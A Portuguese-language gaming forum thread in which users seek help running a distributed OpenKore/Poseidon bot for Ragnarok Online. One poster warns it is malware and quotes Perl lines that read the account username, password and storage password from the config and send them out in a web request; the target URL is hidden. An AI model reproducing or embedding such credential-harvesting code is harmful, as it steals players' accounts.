Ir para conteúdo
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Posts Recomendados

velho tive a felicidade de conseguir conectar 1x ai fexei pra configurar pra otro mapa e tals

qd abri denovo o msm erro que tava dando antes, funfou do nada e agora parou de funfar denovo. como vc pediu, ta ae o link do print do erro, muito obrigado vê se consegue me ajudar

É necessário se cadastrar para acessar o conteúdo.

cara num sei pq o meu não esta abrindo o startRO segui as ss

abrindoposeidon.jpg

e quando e pra abri o start

noabre.jpg

aparece essa tela, mas tipo so pisca e ela some =/

ve se vc consegue me ajuda.

Abs.

Topico Bom Porem Não Sei Se E Funcional Tomara Que Seja

Continue Assim ...

Abrçz

Topico Bom Porem Não Sei Se E Funcional Tomara Que Seja

Continue Assim ...

Abrçz

Sim funciona perfeitamente,é porque estão tentando abrir com o Seven ou Vista,ae não vai abrir nunca xD so vai abrir com XP ou maquina virtual

alucard o meu eh no xp msm, as vezes conecta por sorte e mt vezes n, postei a imagem como vc pediu ali emcima,da uma olhada pra mim plx.

to usando windows xp e o perl que ta no link. da uma olhada ai pra mim plx

virus, olha o que tem no codigo dele ...

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

pow as vezes funciona as vezes nao..ta osso.. alucard nao tem nenhuma idea de qual seja o problema ???

pow as vezes funciona as vezes nao..ta osso.. alucard nao tem nenhuma idea de qual seja o problema ???

Voce deve estar errando em alguma parte

Aluc@rd2 vc não sabe dizer pq o meu num ta abrindo?

Abs.

Qual sistema operacional você está usando,pode ser isso

Qual sistema operacional você está usando,pode ser isso

N cara rlx ja arrumei aq parabéns o bot pega perfeitamente e esses cara q fica vindo aq trollar o bot do cara vão td se fude. Quem quise baixe quem n quise se foda!

Abs.

Opa obriigado xD,se precisar de ajuda volte aqui e pergunte,sempre responderei aos necessitados xD,NÃO ESQUEÇA DE AGRADECER XD

Galeraaaaaaaaaaaaaa!!!!!!!!!!!!!

Pode baixaaaaarrr!!!!!!!!! *-----------------------------------------*

Tá la lista dos top 3!!!!! Sem mentiraaa!!! Nossa, além de ser limpo totaaaal, ele roda perfeitinho (XP).

Eu uso e RECOMENDO!!!

Vlw pelo post ;D

Aew man mais uma dúvida...

Como q faz pro bot vender itens automaticamente?

Valeus, abraços! ;D

cara aki fica falando Reconectando e n entra sabe me dizer pq?

eu uso win XP

cara aki fica falando Reconectando e n entra sabe me dizer pq?

eu uso win XP

Instalo o active perl corretamente,e abriu os arquivos certos,tem que conferir cada parte

Alucard só tenho que agradecer esse openkore,estou upando muito facil,,,,,,iria demorar 2 semanas para pegar o lvl que peguei em uma única noite obrigado mesmo ^^ /s

Cara eu n tenho nem um Poseidon.PL nem Openkore.PL esse "PL" que vc diz ta escrito em baixo como arquivo PL néh?

Instalo o active perl corretamente,e abriu os arquivos certos,tem que conferir cada parte
Cara eu n tenho nem um Poseidon.PL nem Openkore.PL esse "PL" que vc diz ta escrito em baixo como arquivo PL néh?

PL é a extensão do arquivo,instalo o active perl correto ele que irá dar a extensão do arquivo

Me manda seu msn por menssagem particular que irei te ajudar nessa

cara namoral eu preciso muito desse hacker me passa seu msn ou então me add la? pelo amor de deus n sei mais oq eu fasso

PL é a extensão do arquivo,instalo o active perl correto ele que irá dar a extensão do arquivo

Me manda seu msn por menssagem particular que irei te ajudar nessa

[email protected]

add ai se n me passa o seu

add ai cara ou se n me passa o seu velho preciso coloca esse bot hoje x.x

Este tópico está impedido de receber novos posts.
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.